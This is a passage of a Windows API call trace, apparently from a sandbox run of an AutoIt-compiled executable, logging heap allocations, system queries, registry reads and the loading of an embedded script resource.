¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÝ\x8bÆ·ØúF\x01g\x9a+", lpUsedDefaultChar=0x0) returned 256 [0069.931] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0069.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0069.931] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.931] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3c) returned 0x178c138 [0069.932] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x178a770 [0069.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17966b0 [0069.932] GetVersionExW (in: lpVersionInformation=0x146f9b4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0x2b2a2928, szCSDVersion="⴬⼮㄰㌲㔴㜶㤸㬺㴼㼾䅀䍂䕄䝆䥈䭊䵌低児卒啔坖奘孚嵜彞慠换敤杦楨歪浬潮煰獲<") | out: lpVersionInformation=0x146f9b4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0069.932] GetCurrentProcess () returned 0xffffffff [0069.932] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x146fb04 | out: Wow64Process=0x146fb04) returned 1 [0069.932] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0069.932] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0069.932] GetNativeSystemInfo (in: lpSystemInfo=0x146fad0 | out: lpSystemInfo=0x146fad0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0069.933] FreeLibrary (hLibModule=0x772d0000) returned 1 [0069.933] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x178a860 [0069.933] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x178a680 [0069.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1796780 [0069.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x178a6b0 [0069.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17966c0 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x178a998 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x1796760 [0069.934] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x178a908 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17966d0 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789818 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17967a0 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789728 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2e0 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789740 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d120 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789830 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d290 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789878 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d130 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x1789890 [0069.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d190 [0069.934] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0069.935] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0069.935] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0069.935] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0069.935] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0069.935] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d570 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d140 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d4f8 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d170 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d588 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d150 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d528 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d110 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d540 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d0f0 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d7e0 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d180 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d510 [0069.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1e0 [0069.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d630 [0069.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1d0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d5a0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d280 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d690 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1a0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1f0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d5b8 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2d0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d600 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d100 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d750 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1c0 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d558 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d160 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d768 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d250 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d1b0 [0069.982] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1a4 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d648 [0069.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d200 [0069.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x178c2e8 [0069.984] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.984] OleInitialize (pvReserved=0x0) returned 0x0 [0070.004] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d660 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d270 [0070.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x146fad8 | out: phkResult=0x146fad8*=0x234) returned 0x0 [0070.004] RegQueryValueExW (in: hKey=0x234, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x146faf4, lpcbData=0x146fadc*=0x8 | out: lpType=0x0, lpData=0x146faf4*=0x30, lpcbData=0x146fadc*=0x4) returned 0x0 [0070.004] RegCloseKey (hKey=0x234) returned 0x0 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b330 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d260 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2a0 [0070.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d220 [0070.004] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d618 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d230 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b0d8 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d240 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d5e8 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2b0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d678 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2c0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d6a8 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d2f0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d6c0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d300 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d798 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3f0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d6d8 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d490 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d6f0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d310 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d708 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3e0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d738 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d4a0 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d780 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d390 [0070.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d7b0 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d460 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d7c8 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d320 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d840 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d4b0 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d828 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d330 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d7f8 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d410 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d888 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d3a0 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d858 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d340 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d870 [0070.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d400 [0070.006] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.006] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d8a0 [0070.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d350 [0070.010] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x144faa8, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe")) returned 0x28 [0070.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x178ddd8 [0070.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d420 [0070.013] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x143fa98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x0) returned 0x28 [0070.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d8a0 | out: hHeap=0x1780000) returned 1 [0070.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x17844c8 [0070.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178ddd8 | out: hHeap=0x1780000) returned 1 [0070.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d420 | out: hHeap=0x1780000) returned 1 [0070.013] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x144fab4, lpFilePart=0x145fab4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x145fab4*="42F0.TMP.EXE.exe") returned 0x28 [0070.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x179b060 [0070.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d8a0 [0070.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d8b8 [0070.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d380 [0070.013] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x145fad0 | out: phkResult=0x145fad0*=0x0) returned 0x2 [0070.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d8b8 | out: hHeap=0x1780000) returned 1 [0070.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d380 | out: hHeap=0x1780000) returned 1 [0070.013] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.014] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.015] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d8b8 [0070.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d420 [0070.015] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0070.015] IsThemeActive () returned 0x1 [0070.016] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x146fafc, fWinIni=0x0 | out: pvParam=0x146fafc) returned 1 [0070.016] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 0 [0070.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x179d810 [0070.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d360 [0070.016] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x145fad0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0070.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x17a1570 [0070.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d370 [0070.017] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x143fa30, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe")) returned 0x28 [0070.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x178ddd8 [0070.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d470 [0070.019] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x142fa20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x0) returned 0x28 [0070.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178a998 | out: hHeap=0x1780000) returned 1 [0070.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x1784160 [0070.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x178ddd8 | out: hHeap=0x1780000) returned 1 [0070.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d470 | out: hHeap=0x1780000) returned 1 [0070.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x178c330 [0070.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d430 [0070.019] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0070.019] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0070.019] Wow64DisableWow64FsRedirection (in: OldValue=0x144fa34 | out: OldValue=0x144fa34*=0x0) returned 1 [0070.019] FreeLibrary (hLibModule=0x772d0000) returned 1 [0070.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e68 [0070.020] GetCurrentPackageId () returned 0x3d54 [0070.020] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x144f8d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0070.020] GetFileType (hFile=0x234) returned 0x1 [0070.020] LoadLibraryExW (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0070.021] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0070.021] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x772e6b50 [0070.021] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0070.021] FreeLibrary (hLibModule=0x772d0000) returned 1 [0070.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x17a1660 [0070.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x179d380 [0070.022] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x144fa90 | out: ppstm=0x144fa90*=0x179b1c8) returned 0x0 [0070.025] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358440 [0070.025] LoadResource (hModule=0x290000, hResInfo=0x358440) returned 0x360410 [0070.025] SizeofResource (hModule=0x290000, hResInfo=0x358440) returned 0x4bb58 [0070.025] LockResource (hResData=0x360410) returned 0x360410 [0070.025] ISequentialStream:RemoteWrite (in: This=0x179b1c8, pv=0x360410*=0xa3, cb=0x4bb58, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0070.031] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.031] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.031] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x17a1660, cb=0x18, pcbRead=0x144f9bc | out: pv=0x17a1660*=0xa3, pcbRead=0x144f9bc*=0x18) returned 0x0 [0070.031] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.031] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa00, cb=0x4, pcbRead=0x144f9bc | out: pv=0x144fa00*=0x45, pcbRead=0x144f9bc*=0x4) returned 0x0 [0070.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d380 | out: hHeap=0x1780000) returned 1 [0070.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17a1660 | out: hHeap=0x1780000) returned 1 [0070.031] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa24, cb=0x10, pcbRead=0x144f9fc | out: pv=0x144fa24*=0x4d, pcbRead=0x144f9fc*=0x10) returned 0x0 [0070.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144f8f8 | out: lpSystemTimeAsFileTime=0x144f8f8*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.032] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.032] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144f378, cb=0x4, pcbRead=0x144f13c | out: pv=0x144f378*=0x6b, pcbRead=0x144f13c*=0x4) returned 0x0 [0070.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144f038 | out: lpSystemTimeAsFileTime=0x144f038*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144f380, cb=0x4, pcbRead=0x144f13c | out: pv=0x144f380*=0xa6, pcbRead=0x144f13c*=0x4) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144f168, cb=0x34, pcbRead=0x144f13c | out: pv=0x144f168*=0xe1, pcbRead=0x144f13c*=0x34) returned 0x0 [0070.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144f038 | out: lpSystemTimeAsFileTime=0x144f038*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144f380, cb=0x4, pcbRead=0x144f13c | out: pv=0x144f380*=0x1e, pcbRead=0x144f13c*=0x4) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144f3ac, cb=0x7c, pcbRead=0x144f13c | out: pv=0x144f3ac*=0xff, pcbRead=0x144f13c*=0x7c) returned 0x0 [0070.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144f038 | out: lpSystemTimeAsFileTime=0x144f038*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa33, cb=0x1, pcbRead=0x144f384 | out: pv=0x144fa33*=0x0, pcbRead=0x144f384*=0x1) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa2c, cb=0x4, pcbRead=0x144f384 | out: pv=0x144fa2c*=0xbc, pcbRead=0x144f384*=0x4) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa2c, cb=0x4, pcbRead=0x144f384 | out: pv=0x144fa2c*=0xbc, pcbRead=0x144f384*=0x4) returned 0x0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x144fa2c, cb=0x4, pcbRead=0x144f384 | out: pv=0x144fa2c*=0x84, pcbRead=0x144f384*=0x4) returned 0x0 [0070.032] IStream:RemoteSeek (in: This=0x179b1c8, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0070.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x179d380 [0070.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x179d3b0 [0070.032] ISequentialStream:RemoteRead (in: This=0x179b1c8, pv=0x179d3b0, cb=0x0, pcbRead=0x144f384 | out: pv=0x179d3b0*=0x6e, pcbRead=0x144f384*=0x0) returned 0x0 [0070.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x144f280 | out: lpSystemTimeAsFileTime=0x144f280*(dwLowDateTime=0xf5e113b1, dwHighDateTime=0x1d69b3e)) [0070.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179d380 | out: 